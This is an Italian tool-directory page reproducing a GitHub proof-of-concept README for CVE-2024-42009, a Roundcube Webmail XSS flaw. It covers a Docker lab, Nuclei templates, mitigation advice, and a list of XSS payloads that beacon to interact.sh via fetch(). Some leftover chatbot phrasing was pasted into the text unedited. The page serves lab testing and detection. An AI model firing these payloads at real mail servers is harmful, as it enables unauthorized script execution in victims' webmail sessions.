Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42009 | Kitploit
Strumenti/GitHubGitHub/shubhankargupta691/cve-2024-42009
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Vedi Repository
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-42009 – XSS riflesso in Roundcube Webmail

📌 Panoramica

Questo repository contiene un template Nuclei e risorse di supporto per dimostrare e validare in sicurezza CVE-2024-42009, una vulnerabilità critica di XSS riflesso in Roundcube Webmail. Il difetto risiede nella funzione message_body() in show.php, dove le modifiche post-sanificazione portano a desanificazione e rendering non sicuro di contenuti email HTML appositamente creati.

⚠️ Questo PoC è destinato esclusivamente a scopi educativi e test autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione di test.


🧠 Riepilogo della vulnerabilità

  • ID CVE: CVE-2024-42009
  • Gravità: Critica (CVSS 9.8)
  • Versioni interessate: Roundcube ≤ 1.6.7 e ≤ 1.5.7
  • Versioni corrette: 1.6.8 e 1.5.8
  • Componente: message_body() in show.php
  • Impatto: Esecuzione arbitraria di JavaScript quando un utente visualizza un'email dannosa

🧪 Strategia di rilevamento (solo uso in laboratorio)

Questo repository utilizza il rilevamento Out-of-Band (OOB) tramite Interactsh per confermare l'esecuzione di JavaScript in un laboratorio controllato.

Passaggi chiave:

  1. Distribuire un'istanza vulnerabile di Roundcube (ad es. tramite Docker)
  2. Inviare un'email appositamente costruita con tag <body> contenente onanimationstart e un beacon verso Interactsh
  3. Aprire l'email nell'interfaccia di Roundcube
  4. Confermare il callback DNS/HTTP verso il dominio Interactsh

🐳 Configurazione del laboratorio

Utilizza il file Docker Compose fornito per avviare un'istanza locale di Roundcube con MailHog (sink SMTP) e MariaDB.

root@kitploit:~
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Interfaccia Roundcube: http://localhost:8080
  • Interfaccia MailHog: http://localhost:8025
  • Metodo di accesso: Account Google

⚠️ Non utilizzare il tuo account Google.


📁 Contenuto del repository

  • CVE-2024-42009-OOB.yaml – Template Nuclei con rilevamento Interactsh e Out-of-Band (OOB)
  • CVE-2024-42009.yaml – Template Nuclei senza Interactsh e OOB
  • docker-compose.yml – Configurazione dell'ambiente di laboratorio per Roundcube Webmail
  • Images/ – Screenshot che mostrano gli hit HTTP/DNS da Interactsh

🎥 Dimostrazione video

Questo video illustra l'intera catena di exploit:

  • Creazione del payload
  • Invio tramite email o endpoint
  • Attivazione della vulnerabilità
  • Conferma del beacon tramite Interactsh

(dimostrazione video)


Per includere responsabilmente questi payload XSS nel tuo README, dovrai inserirli in una sezione chiaramente etichettata per scopi educativi o di test. Ecco una struttura suggerita:


🧪 Esempi di payload XSS (solo per scopi di test)

⚠️ Disclaimer: Questi payload sono destinati esclusivamente a uso educativo e test di sicurezza autorizzati. Non distribuirli su sistemi senza autorizzazione esplicita.

root@kitploit:~
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">

<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>

<!-- JavaScript in iframe src -->

🧭 Come usare

  • Sostituisci https://interact.sh/hit con il tuo endpoint listener.
  • Usali in ambienti controllati come laboratori locali o piattaforme CTF.
  • Monitora il tuo endpoint per le richieste in arrivo per validare l'esecuzione.

🛡️ Mitigazione

Aggiorna Roundcube a:

  • 1.6.8 o 1.5.8
    Queste versioni rimuovono la logica di post-elaborazione vulnerabile e applicano una sanificazione più severa e header CSP.

📜 Riferimenti

Perfetto — ecco una sezione Riferimenti pulita e professionale che puoi includere nel tuo README o nell'invio via email per CVE-2024-42009. Cita tutte le fonti che hai elencato, formattate per chiarezza e credibilità:


📚 Riferimenti

  • Scheda CVE NVD – CVE-2024-42009 – Elenco ufficiale della vulnerabilità con punteggio CVSS e versioni interessate
  • SonarSource Blog – Government Emails at Risk – Analisi tecnica approfondita e dettagli sullo sfruttamento
  • PoC GitHub di DaniTheHack3r – Exploit basato su Python con listener email e payload attivato da animazione
  • PoC GitHub di Bhanunamikaze – Iniezione automatica di payload ed esfiltrazione tramite listener HTTP
  • PoC GitHub di 0xbassiouny1337 – Exploit XSS persistente con acquisizione e decodifica email in tempo reale
Scarica lo strumento